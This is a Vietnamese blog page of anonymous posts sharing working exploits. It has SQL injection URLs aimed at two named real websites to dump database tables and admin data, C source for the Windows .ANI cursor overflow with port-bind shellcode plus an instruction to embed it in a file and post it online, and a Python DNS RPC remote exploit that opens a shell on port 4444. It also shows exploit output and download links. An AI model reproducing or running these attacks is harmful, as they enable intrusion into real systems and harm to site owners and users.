Blog Lá Cải

exploit

http://www.vietphong.com.vn/product_detail.php?cat=64&id=-1 union all select 1,2,3,4,5,concat(table_name,char(124),char(124),column_name),7,8,9,10,11,12,13,14 from information_schema.columns/*

http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921'&LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx
http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921 union select 0 from admin%22having 1=1--sp_password &LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx
http://www.phapvan.ca/noidung/Tin_tuc.asp?act=XemChiTiet&Cat_ID=2&News_ID=921 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin&LinksFrom=http://www.phapvan.ca/noidung/Tin_tuc.aspx

được đăng bởi Nặc danh @ 06:41 0 Nhận xét

Default MS Windows Animated Cursor (.ANI) Local Overflow Exploit

/*
.ANI exploit tested on Windows XP SP2 - Portuguese
Shellcode port bind 13579

JMP ESP Addr - ntdll.dll

Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna.


Exploit coded listen sauna hits
Featuring Luiz Zanardo's gigs "Minoide -\x52\x49\x46\x46\x00\x04\x00\x41"

Breno Silva Pinto
bsilva[at]Sekure.org
*/




#include
#include
#include


unsigned char aniheader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\ x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\ x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\ x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\ x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

unsigned char Shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\ x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\ xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\ x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\ x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\ xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\ x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\ xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\ xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\ xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\ x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\ xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\ x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\ xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\ x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\ xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\ x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\ x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\ xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\ x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\ xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85" ;


int main( int argc, char **argv ) {
char Buffer[1024];
FILE *f;

if ( argc <>
printf("usage %s \n",argv[0]);
return 0;
}

memset( Buffer, 0x90, sizeof( Buffer ) );
memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 );

memcpy( Buffer + 168, "\xed\x1e\x94\x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha!
memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 );


f = fopen( argv[1], "wb" );
if ( f == NULL ) {
printf("Cannot create file\n");
return 0;
}

fwrite(Buffer, 1, 1024, f);
fclose(f);
printf(".ANI file created!\n");
return 0;
}

Compile->Run để nhúng vô .ani file! Bỏ lên web!

được đăng bởi Nặc danh @ 00:21 0 Nhận xét

Windows 2k SP4 DNS RPC

#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid

#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\ x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\ x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\ x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\ xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\ xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\ x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\ xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\ xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\ x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\ x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\ x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\ xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\ x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\ x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\ x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\ x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\ x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\ xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\ x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\ x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

# Stub sections taken from metasploit
stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\ x04\x00\x00\x00'
stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\ x12\x05\x00\x00'
stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
stub += '\\A' * 465
# At the time of overflow ESP points into our buffer which has each char
# prepended by a '\' and our shellcode code is about 24+ bytes away from
# where EDX points
stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode
stub += '\\B' * 43
# Translates to 'jmp EDX'
stub += '\\\xff\\\xe2'
stub += '\\A' * 134
stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\ x00\x00\x00\x00'
stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
stub += shellcode

# Code ripped from core security document on impacket
# http://www.coresecurity.com/files/at...etv0.9.6.0.pdf
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
handle = '\x00'*20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)

print '[-] Could not locate DNS port; Target might not be running DNS'

def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))

dce.call(0x01, stub)

def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)

if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s ' % sys.argv[0]
sys.exit(-1)

print '[+] Locating DNS RPC port'
port = DiscoverDNSport(target)
print '[+] Located DNS RPC service on TCP port: %d' % port
ExploitDNS(target, port)
print '[+] Exploit sent. Connecting to shell in 3 seconds'
time.sleep(3)
ConnectRemoteShell(target)

được đăng bởi Nặc danh @ 00:19 0 Nhận xét

MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- Universal local exploit for Win2k (automatic search for opcodes)
- Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
- Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
- Microsoft RPC api used ( who cares? )


D:\Program Files\DNSTEST>dnstest
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )
2 (0x7c4fedbb) - Win2k server SP4 English
3 (0x7963edbb) - Win2k server SP4 Italian
4 (0x41414141) - Windows all Denial of Service


D:\Program Files\DNSTEST>dnstest.exe -h 192.168.1.2
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

được đăng bởi Nặc danh @ 00:15 0 Nhận xét